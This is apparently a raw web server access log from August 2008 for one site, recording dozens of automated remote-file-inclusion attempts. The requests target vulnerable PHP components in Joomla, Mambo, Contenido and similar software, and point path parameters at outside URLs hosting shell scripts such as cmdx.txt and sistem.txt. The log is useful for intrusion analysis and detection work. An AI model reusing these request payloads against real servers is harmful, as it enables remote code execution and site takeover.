64.185.237.191 - - [24/Aug/2008:10:05:55 -0700] "GET /logs/access_080530.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:05:55 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:05:56 -0700] "GET /logs/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:10:05:56 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:06:01 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:06:01 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:06:20 -0700] "GET /logs/access_080612.log/show_archives.php?template=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
78.110.50.122 - - [24/Aug/2008:10:06:30 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=uid=14599(srv14599)%20gid=1000(hosting)%20groups=1000(hosting)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.122 - - [24/Aug/2008:10:06:31 -0700] "GET //?path%5Bdocroot%5D=uid=14599(srv14599)%20gid=1000(hosting)%20groups=1000(hosting)%0A? HTTP/1.1" 200 9914 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.122 - - [24/Aug/2008:10:06:32 -0700] "GET /logs//?path%5Bdocroot%5D=uid=14599(srv14599)%20gid=1000(hosting)%20groups=1000(hosting)%0A? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:10:06:33 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.110.50.122 - - [24/Aug/2008:10:06:50 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=uid=14599(srv14599)%20gid=1000(hosting)%20groups=1000(hosting)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:07:01 -0700] "GET /logs/access_080530.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:07:02 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:07:02 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:07:30 -0700] "GET /logs/access_080625.log//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:07:30 -0700] "GET //common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:07:30 -0700] "GET /logs//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:07:37 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:10:07:43 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:10:07:43 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.75.63 - - [24/Aug/2008:10:07:46 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
89.108.90.204 - - [24/Aug/2008:10:08:00 -0700] "GET //modules/Forums/admin/errors.php?error=http://www.gelika.com.ua/c15e61196e3a06692913c0286b2a74eb/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.90.204 - - [24/Aug/2008:10:08:00 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://www.gelika.com.ua/c15e61196e3a06692913c0286b2a74eb/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.75.63 - - [24/Aug/2008:10:08:01 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:08:03 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:08:21 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:08:51 -0700] "GET /logs/access_080416.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:08:51 -0700] "GET /logs/access_080802.log//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:08:52 -0700] "GET /logs//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:08:53 -0700] "GET //index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9930 "-" "libwww-perl/5.811" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:08:57 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:08:58 -0700] "GET /logs/access_080625.log//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:08:59 -0700] "GET //common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:08:59 -0700] "GET /logs//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.90.204 - - [24/Aug/2008:10:09:09 -0700] "GET /logs/access_080412.log//modules/Forums/admin/errors.php?error=http://www.gelika.com.ua/c15e61196e3a06692913c0286b2a74eb/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:09:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:09:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:09:21 -0700] "GET /errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:09:32 -0700] "GET /logs/access_080728.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:09:32 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:09:32 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.240.239.2 - - [24/Aug/2008:10:09:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.240.239.2 - - [24/Aug/2008:10:09:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:10:09:46 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:09:51 -0700] "GET /logs/access_080728.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:09:51 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:09:52 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:10:10:08 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:10:10:08 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:10:10:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:10:13 -0700] "GET /logs/access_080718.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:10:13 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:10:13 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
69.64.34.172 - - [24/Aug/2008:10:10:14 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.brguild.t5.com.br/forum//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:10:39 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:10:39 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:10:41 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:10:41 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.52.143.147 - - [24/Aug/2008:10:10:43 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.52.143.147 - - [24/Aug/2008:10:10:43 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:10:43 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:10:44 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 10056 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:10:45 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:10:56 -0700] "GET /logs/access_080807.log/index.php?lang=gr&filehttp://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:10:11:07 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:11:08 -0700] "GET /components/com_mambowiki/MamboLogin.php?IP=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:11:08 -0700] "GET /logs/access_080802.log//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.192.243.2 - - [24/Aug/2008:10:11:45 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 61999 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
137.192.243.2 - - [24/Aug/2008:10:11:45 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 200 9926 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.249.18.10 - - [24/Aug/2008:10:11:52 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.249.18.10 - - [24/Aug/2008:10:12:03 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://xwarezx.secretivens.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:12:07 -0700] "GET /logs//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:12:09 -0700] "GET //index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 9930 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:12:14 -0700] "GET /logs//index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:12:15 -0700] "GET //index.php?sourcedir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 200 9927 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:12:38 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:12:39 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:10:12:40 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:10:12:40 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:10:12:40 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:12:44 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:12:45 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 200 9933 "-" "libwww-perl/5.811" "www.dmulk.com"
216.55.159.47 - - [24/Aug/2008:10:12:51 -0700] "GET /logs/access_080811.log/?view=page&pagename=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [24/Aug/2008:10:12:52 -0700] "GET /?view=page&pagename=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 8018 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [24/Aug/2008:10:12:52 -0700] "GET /logs/?view=page&pagename=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 61999 "-" "libwww-perl/5.803" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:13:09 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:13:16 -0700] "GET /logs/access_080625.log//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:13:16 -0700] "GET //common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:13:17 -0700] "GET /logs//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.156.4 - - [24/Aug/2008:10:13:20 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.811" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:13:27 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:13:29 -0700] "GET /logs/access_080723.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:13:29 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:13:29 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:13:31 -0700] "GET /logs/oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:13:31 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:13:33 -0700] "GET /logs/oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:13:33 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.52.143.147 - - [24/Aug/2008:10:13:33 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.52.143.147 - - [24/Aug/2008:10:13:34 -0700] "GET /logs/oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:10:13:56 -0700] "GET /logs/access_080722.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:13:56 -0700] "GET /logs/access_080718.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
